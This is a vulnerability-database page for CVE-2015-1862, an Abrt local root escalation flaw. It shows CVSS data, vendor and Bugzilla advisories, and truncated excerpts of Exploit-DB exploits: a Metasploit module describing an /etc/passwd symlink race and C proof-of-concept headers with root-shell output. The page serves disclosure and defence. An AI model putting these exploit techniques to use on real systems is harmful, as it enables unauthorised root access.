CVE-2015-1862
published 2018-02-09CVE-2015-1862: The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a…
PriorityP342high7CVSS 3.0
AVLACHPRLUINSUCHIHAH
EXPLOIT
EPSS
3.08%
86.0th percentile
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| abrt_project | abrt | <= 2.2.0 | — |
CVSS provenance
nvdv3.07.0HIGHCVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
abrt: local privilege escalation through kernel.core_pattern
vendor_redhat·2015-04-14·CVSS 7.0
CVE-2015-1862 [HIGH] abrt: local privilege escalation through kernel.core_pattern
abrt: local privilege escalation through kernel.core_pattern
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment.
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Statement: Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7
Package: abrt (Red Hat Enterprise Linux 6) - Not affected
Package: abrt (Red Hat Enterprise Linux 7) - Not affected
GHSA
GHSA-vwwv-5cgp-6jw3: The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directo
ghsa_unreviewed·2022-05-14
CVE-2015-1862 [HIGH] CWE-362 GHSA-vwwv-5cgp-6jw3: The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directo
The crash reporting feature in Abrt allows local users to gain privileges by leveraging an execve by root after a chroot into a user-specified directory in a namedspaced environment.
No detection rules found.
Exploit-DB
ABRT - 'raceabrt' Privilege Escalation (Metasploit)
exploitdb·2018-02-16·CVSS 7.8
CVE-2015-3315 [HIGH] ABRT - 'raceabrt' Privilege Escalation (Metasploit)
ABRT - 'raceabrt' Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'ABRT raceabrt Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Fedora systems with
a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
as the crash handler.
A race condition allows local users to change ownership of arbitrary
files (CVE-2015-3315). This module uses a symlink attack on
'/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
then adds a new user with UID=0 GID=0 to gain root privileges.
Winning the race could take a few minutes.
This module has been tested successfully on ABRT packaged ve
Exploit-DB
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
exploitdb·2015-04-14·CVSS 7.2
CVE-2015-1862 [HIGH] Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
---
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
# warning this file must be compiled with -static
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- [email protected], April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
int main(int argc, char **argv)
{
int status;
Elf32_Phdr *hdr;
pid_t wrapper;
pid_t init;
pid_t subprocess;
unsigned i;
// Verify this is a static executable by checking the program headers for a
// d
Exploit-DB
Abrt (Fedora 21) - Race Condition
exploitdb·2015-04-14·CVSS 7.0
CVE-2015-3315 [HIGH] Abrt (Fedora 21) - Race Condition
Abrt (Fedora 21) - Race Condition
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//
// This is a race condition exploit for CVE-2015-1862, targeting Fedora.
//
// Note: It can take a few minutes to win the race condition.
//
// -- [email protected], April 2015.
//
// $ cat /etc/fedora-release
// Fedora release 21 (Twenty One)
// $ ./a.out /etc/passwd
// [ wait a few minutes ]
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-1
Bugzilla
CVE-2015-5271 openstack-tripleo-heat-templates: unsafe pipeline ordering of swift staticweb middleware
bugzilla·2015-09-10·CVSS 7.5
CVE-2015-5271 [HIGH] CVE-2015-5271 openstack-tripleo-heat-templates: unsafe pipeline ordering of swift staticweb middleware
CVE-2015-5271 openstack-tripleo-heat-templates: unsafe pipeline ordering of swift staticweb middleware
A flaw was discovered in the pipeline ordering of the swift staticweb middleware in the swiftproxy config generated from the openstack-tripleo-heat-templates. The staticweb middleware was incorrectly configured before keystone and under some conditions may allow unauthenticated access to private data.
Acknowledgements:
This issue was discovered by Christian Schwede and Emilien Macchi of Red Hat.
Discussion:
*** Bug 1261499 has been marked as a duplicate of this bug. ***
---
This issue has been addressed in the following products:
OpenStack 7.0 Director/Manager for RHEL 7
Via RHSA-2015:1862 https://access.redhat.com/errata/RHSA-2015:1862
---
Created openstack-tripleo-heat-templ
Bugzilla
CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
bugzilla·2015-04-13·CVSS 7.0
CVE-2015-1862 [HIGH] CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application.
Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"
This commit was added to abrt via: (To add support for handling crashes inside containers)
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809
But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82
No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.
Support for containers wa
http://packetstormsecurity.com/files/131422/Fedora-abrt-Race-Condition.htmlhttp://packetstormsecurity.com/files/131423/Linux-Apport-Abrt-Local-Root-Exploit.htmlhttp://packetstormsecurity.com/files/131429/Abrt-Apport-Race-Condition-Symlink.htmlhttp://seclists.org/fulldisclosure/2015/Apr/34http://www.openwall.com/lists/oss-security/2015/04/14/4http://www.securityfocus.com/bid/74263https://bugzilla.redhat.com/show_bug.cgi?id=1211223https://github.com/abrt/abrt/pull/810https://www.exploit-db.com/exploits/36746/https://www.exploit-db.com/exploits/36747/http://packetstormsecurity.com/files/131422/Fedora-abrt-Race-Condition.htmlhttp://packetstormsecurity.com/files/131423/Linux-Apport-Abrt-Local-Root-Exploit.htmlhttp://packetstormsecurity.com/files/131429/Abrt-Apport-Race-Condition-Symlink.htmlhttp://seclists.org/fulldisclosure/2015/Apr/34http://www.openwall.com/lists/oss-security/2015/04/14/4http://www.securityfocus.com/bid/74263https://bugzilla.redhat.com/show_bug.cgi?id=1211223https://github.com/abrt/abrt/pull/810https://www.exploit-db.com/exploits/36746/https://www.exploit-db.com/exploits/36747/
2018-02-09
Published